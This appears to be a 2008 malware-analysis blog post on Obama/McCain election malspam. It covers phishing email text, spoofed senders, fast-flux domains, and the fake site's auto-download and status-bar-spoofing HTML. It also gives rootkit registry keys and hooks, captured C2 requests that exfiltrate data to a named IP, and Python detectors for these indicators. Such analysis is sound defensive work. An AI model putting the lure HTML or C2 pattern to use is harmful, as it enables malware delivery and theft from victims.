Sunday, November 9, 2008

Presidential Malspam

On 05 November 2008, emails about Barack Obama began circulating that contained hyperlinks to a fake news site offering a video of Obama's historic win. The site attempted to fool visitors into installing a fake Adobe Flash update, adobe_flash.exe. The downloaded executable installs an Infostealer trojan designed to steal personal information. Sophos and McAfee provided updates on the threat.

Sample email verbiage included the following:

"From: "President election results"
Subject: A new president, a new congress...
Barack Obama Elected 44th President of United States Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5! ...... "

On 7 November 2008, it was McCain's turn to be center stage on the malspam front. The following is a sample email with a hyperlink to a fake usa.gov news website.

From: USA news [mailto:videonews@usa.gov]
Sent: Friday, November 07, 2008 10:53 AM
Subject: McCain want to stop Obama

McCain Lawyer Impeach Obama!
McCain has reached an agreement with the Obama lawyers that makes Obama resignation effective November 11.
Barack Obama can lost President's Chair.
McCain video report 7 November:

Proceed to the election results news page>> <http://productsremote.configlogin.selfservice.YwgnjIkoZ.viewcontent.privatelogin.TW76dHSS4.serensy.com/services.htm?/rnalid/siteminderagent/OSL.htm?LOGIN=TlbX8Ywgnj&VERIFY=IkoZR9TW76dHSS4> 2008 USA Government Official Web Site.


Sample malspam email subjects include:

McCain Lawyers Want to Stop Obama
Barack Obama in Danger - McCain will fight for president post
McCain Lawmakers Impeach Obama
McCain said today: 'Impeach Obama'
Obama Impeachment Resources: McCain Look at the Impeachment Process ...
Obama faces impeachment
The Impeachment of new president Obama
IMPEACH Barrack Obama | USA government news
Scandal: Obama Resignation Letter
Video: Obama post-resignation speech
Barack Obama can lost President's Chair. The President's Resignation.
Barack Obama can lost presidents chair.The President's Resignation Speech - TIME
Barack Obama president resignation - 23/7 News
Barack Obama can lost President's Chair. Political Strike at WV Mine
Barack Obama can lost President's Chair. Political Strike Confronts the Global Economy
Barack Obama can lost President's Chair.POLITICAL STRIKE TIES
McCain strike against Obama political way
Obama vs McCain 'Political Strike' May Undermine Labor Group
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Why MccAin Want to Stop Obama From president vacancy?
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
WScandal: Re-elections hich John McCain will show up to debate?
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections Why McCain Will Win
Scandal: Re-elections John McCain will defeat Barack Obama

Sample malspam email From field values include:

USA Government Center
USA news
CNN news
McCain News Center
Elections Centre
Election News

Sample malspam email From spoofed addresses include:

news@usa.gov
videonews@usa.gov
attention@usa.gov
news@usa.com
alert@usa.com
videonews@cnn.com
attention@cnn.com
news@cnn.com
alert@cnn.com

The malspam hyperlinks point to domains hosted on fast-flux infrastructure.

dieytemsn.com
poreibrsu.com
baraokl.com
serensy.com
oritrsunwart.com

The domains mapped to the following fast-flux IP addresses at the time of analysis.

IP Reverse Country
125.0.177.99 ntaich176099.aich.nt.ftth.ppp.infoweb.ne.jp JP
65.34.190.175 c-65-34-190-175.hsd1.fl.comcast.net US
75.31.240.8 adsl-75-31-240-8.dsl.chcgil.sbcglobal.net US
79.177.243.105 bzq-79-177-243-105.red.bezeqint.net IL
122.118.192.172 122-118-192-172.dynamic.hinet.net TW

The hyperlinks point to a fake usa.gov website that advertises a McCain video and links to a supposed "Adobe Flash Media Player" download.

The site uses several methods to trick victims into downloading AdobePlayer9.exe: an automatic meta refresh after 10 seconds, a "Get media player" button, and the video thumbnail itself, whose onMouseOver handler rewrites the browser status bar to show a media.usa.gov URL instead of the real link target.

<meta http-equiv="REFRESH" content="10;url=../AdobePlayer9.exe">

<a href="AdobePlayer9.exe"><img border="0" src="160x41_Get_media_Player.jpg" width="160" height="41"></a>

<a href="AdobePlayer9.exe">
<img border="0" src="McCainvideo.jpg" width="582" height="402" onclick="alert1()" onMouseOver="window.status='http://media.usa.gov/downloads/McCain977855N';
return true" onMouseOut="window.status=''; return true" TARGET="_top"></a>

Malware Analysis

AdobePlayer9.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes

AdobePlayer9.exe creates C:\WINDOWS\9129837.exe

9129837.exe
642a588272e9fe723fb2f1dd8fccede5
25,173 bytes

9129837.exe creates C:\WINDOWS\new_drv.sys

new_drv.sys
a54de1d46ff7bdefbf9d9284c1916c5e
8,192 bytes

The following registry values store malware identification data.

HKEY_CURRENT_USER\Software\Microsoft\InetData "Data"
Type: REG_BINARY
Data: 28, 00, 00, 00, 00, A5, 01, DB, 00, 00, F1, 0C, 65, 30
HKEY_CURRENT_USER\Software\Microsoft\InetData "k1"
Type: REG_DWORD
Data: 50, FF, F4, 94
HKEY_CURRENT_USER\Software\Microsoft\InetData "k2"
Type: REG_DWORD
Data: B8, 72, F7, 4E
HKEY_CURRENT_USER\Software\Microsoft\InetData "version"
Type: REG_SZ
Data: 2

The following registry keys install new_drv.sys as a service. Type 1 marks it as a kernel-mode driver and Start 3 means it is demand-started by the user-mode component.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "DisplayName"
Type: REG_SZ
Data: !!!!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ErrorControl"
Type: REG_DWORD
Data: 00, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "ImagePath"
Type: REG_EXPAND_SZ
Data: \??\C:\WINDOWS\new_drv.sys
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Start"
Type: REG_DWORD
Data: 03, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv "Type"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_NEW_DRV\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv\Security "Security"
Type: REG_BINARY
Data: [HEX VALUES]

The following hidden Run key value launches 9129837.exe at startup.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ttool = C:\WINDOWS\9129837.exe
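A host-side check for the persistence entries above, added here as an example and not part of the original analysis. It parses a 'reg export' dump (constructed sample below) and matches the Run value, the new_drv ImagePath and the InetData version marker; because the rootkit hides these keys from live registry queries, run it against hives exported from an offline or clean-booted system.

```python
# Registry indicators from the analysis above: (key, value name, expected data).
IOCS = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "ttool", r"C:\WINDOWS\9129837.exe"),
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv", "ImagePath", r"\??\C:\WINDOWS\new_drv.sys"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\InetData", "version", "2"),
]

def parse_reg_export(text):
    """Parse 'reg export' output into {key: {name: value}}: "name"="string" values and
    hex(2): (REG_EXPAND_SZ, UTF-16LE) with backslash continuation; other types stay raw."""
    keys, current, pending = {}, None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        if line.endswith("\\"):           # value continues on the next line
            pending = line[:-1]
            continue
        pending = ""
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current and line.startswith('"'):
            name, _, value = line.partition("=")
            name = name.strip('"')
            if value.startswith('"'):      # REG_SZ: exporter doubles backslashes
                value = value[1:-1].replace("\\\\", "\\")
            elif value.startswith("hex(2):"):
                value = bytes.fromhex(value[7:].replace(",", "")).decode("utf-16-le").rstrip("\x00")
            keys[current][name] = value
    return keys

def find_iocs(text):
    """Return the (key, name) pairs whose exported data matches an indicator."""
    reg = parse_reg_export(text)
    return [(k, n) for k, n, want in IOCS
            if reg.get(k, {}).get(n, "").lower() == want.lower()]

# Constructed 'reg export' sample (not from the page) containing two of the three indicators.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ttool"="C:\\WINDOWS\\9129837.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\new_drv]
"DisplayName"="!!!!"
"Start"=dword:00000003
"ImagePath"=hex(2):5c,00,3f,00,3f,00,5c,00,43,00,3a,00,5c,00,57,00,49,00,4e,00,\
  44,00,4f,00,57,00,53,00,5c,00,6e,00,65,00,77,00,5f,00,64,00,72,00,76,00,2e,\
  00,73,00,79,00,73,00,00,00
'''
```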

Both 9129837.exe and new_drv.sys install as a rootkit: their files, registry keys, and processes are hidden. The three SSDT hooks listed below are what achieve this, since NtEnumerateValueKey, NtQueryDirectoryFile and NtQuerySystemInformation are the kernel entry points used to enumerate registry values, directory contents and running processes respectively.

>SSDT State
NtEnumerateValueKey
Actual Address 0x81C1F58A
Hooked by: Unknown module filename

NtQueryDirectoryFile
Actual Address 0x81C1F6B6
Hooked by: Unknown module filename

NtQuerySystemInformation
Actual Address 0x81C1F85C
Hooked by: Unknown module filename

>Processes
!!!!!!!!!!!Hidden process: C:\WINDOWS\9129837.exe
Process Id: 596
EPROCESS Address: 0x81C9D9F8

>Files
Suspect File: C:\WINDOWS\9129837.exe Status: Hidden
Suspect File: C:\WINDOWS\new_drv.sys Status: Hidden

The malware installs inline hooks in running processes. The following example shows the hooks in svchost.exe (PID 1056): CreateProcessA/W, and the wininet.dll functions a process uses to send HTTP requests and read responses.

>Hooks
[1056]svchost.exe-->kernel32.dll-->CreateProcessA, Type: Inline - RelativeJump at address 0x77E61BBC hook handler located in [unknown_code_page]
[1056]svchost.exe-->kernel32.dll-->CreateProcessW, Type: Inline - RelativeJump at address 0x77E61B8E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestA, Type: Inline - RelativeJump at address 0x76210689 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->HttpSendRequestW, Type: Inline - RelativeJump at address 0x7622B059 hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetCloseHandle, Type: Inline - RelativeJump at address 0x7620974B hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetQueryDataAvailable, Type: Inline - RelativeJump at address 0x7620FC5E hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFile, Type: Inline - RelativeJump at address 0x7620FA3C hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExA, Type: Inline - RelativeJump at address 0x7622571D hook handler located in [unknown_code_page]
[1056]svchost.exe-->wininet.dll-->InternetReadFileExW, Type: Inline - RelativeJump at address 0x76240C8A hook handler located in [unknown_code_page]

9129837.exe listens on TCP port 13899 and runs as a hidden process.

Process C:\WINDOWS\9129837.exe (*** hidden ***)

Protocol Local Address Foreign Address State PID PathName
TCP 0.0.0.0 : 13899 0.0.0.0 : 0 LISTENING 596 C:\WINDOWS\9129837.exe
UDP 127.0.0.1 : 1037 * : * 596 C:\WINDOWS\9129837.exe
RAW --- --- --- 596 C:\WINDOWS\9129837.exe

9129837.exe connects to 91.203.93.57 (UA) to register itself, receive instructions and exfiltrate data. The malware makes the following requests:

POST /cgi-bin/pstore.cgi
GET /cgi-bin/cmd.cgi
GET /cgi-bin/options.cgi
POST /cgi-bin/cert.cgi

POST /cgi-bin/pstore.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dbe3fdbe3fdbe3f
User-Agent: IE
Host: 91.203.93.57
Content-Length: 224
Cache-Control: no-cache

----------------------------dbe3fdbe3fdbe3f
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream
Forms:
----------------------------dbe3fdbe3fdbe3f--

GET /cgi-bin/cmd.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57

GET /cgi-bin/options.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd&socks=13899&version=125&crc=00000000 HTTP/1.1
Host: 91.203.93.57

POST /cgi-bin/cert.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------dcd05dcd05dcd05
User-Agent: IE
Host: 91.203.93.57
Content-Length: 298
Cache-Control: no-cache

----------------------------dcd05dcd05dcd05
Content-Disposition: form-data; name="upload_file"; filename="2499084112.2"
Content-Type: application/octet-stream

0S...0...*.H.. .......0.0;0.0...+............2........&..........N...+..\.......{....
----------------------------dcd05dcd05dcd05--
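Network-side detection of the C2 exchange above, added here as an example and not part of the original write-up. It classifies HTTP requests by the six-parameter beacon query string (cmd.cgi/options.cgi) and by the multipart upload pattern (pstore.cgi/cert.cgi with User-Agent "IE" and a <user_id>.<version_id> filename), and extracts the bot identifier and SOCKS port; it assumes requests are available as text, for example from a proxy log or pcap reassembly. The sample traffic is constructed from the captures above.

```python
import re
from urllib.parse import parse_qs, urlsplit

C2_HOST = "91.203.93.57"                       # C2 address from the write-up
BEACON_PATHS = {"/cgi-bin/cmd.cgi", "/cgi-bin/options.cgi"}
UPLOAD_PATHS = {"/cgi-bin/pstore.cgi", "/cgi-bin/cert.cgi"}
BEACON_PARAMS = {"user_id", "version_id", "passphrase", "socks", "version", "crc"}
UPLOAD_NAME_RE = re.compile(r'filename="(\d+)\.(\d+)"')   # <user_id>.<version_id>

def classify_request(raw):
    """Return a dict describing the match, or None. 'raw' is one HTTP request
    (request line, headers, optional body) as text with '\\n' line endings."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    parts = lines[0].split(" ") if lines else []
    if len(parts) != 3:
        return None
    method, target, _ = parts
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    url = urlsplit(target)
    hit = {"method": method, "path": url.path,
           "known_c2": headers.get("host") == C2_HOST}
    if method == "GET" and url.path in BEACON_PATHS:
        q = {k: v[0] for k, v in parse_qs(url.query).items()}
        if BEACON_PARAMS.issubset(q):          # all six beacon parameters present
            hit.update(kind="beacon", user_id=q["user_id"], socks_port=int(q["socks"]))
            return hit
    if method == "POST" and url.path in UPLOAD_PATHS and headers.get("user-agent") == "IE":
        m = UPLOAD_NAME_RE.search(body)
        if m and headers.get("content-type", "").startswith("multipart/form-data"):
            hit.update(kind="upload", user_id=m.group(1), version_id=m.group(2))
            return hit
    return None

def scan(requests):
    """Run classify_request over a list of raw requests and keep the hits."""
    return [h for h in map(classify_request, requests) if h]

# Constructed sample traffic modelled on the captures above (boundary shortened).
SAMPLES = [
    "GET /cgi-bin/cmd.cgi?user_id=2499084112&version_id=2&passphrase=fkjvhsdvlksdhvlsd"
    "&socks=13899&version=125&crc=00000000 HTTP/1.1\nHost: 91.203.93.57\n",
    "POST /cgi-bin/pstore.cgi HTTP/1.1\nContent-Type: multipart/form-data; boundary=--xx\n"
    "User-Agent: IE\nHost: 91.203.93.57\n\n----xx\nContent-Disposition: form-data; "
    'name="upload_file"; filename="2499084112.2"\nContent-Type: application/octet-stream\n'
    "\n----xx--\n",
    "GET /index.html HTTP/1.1\nHost: www.example.com\n",   # benign, must not match
]
```

The beacon's socks parameter is the same port the hidden process listens on (13899), so a hit also tells you which inbound port to look for on the host.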
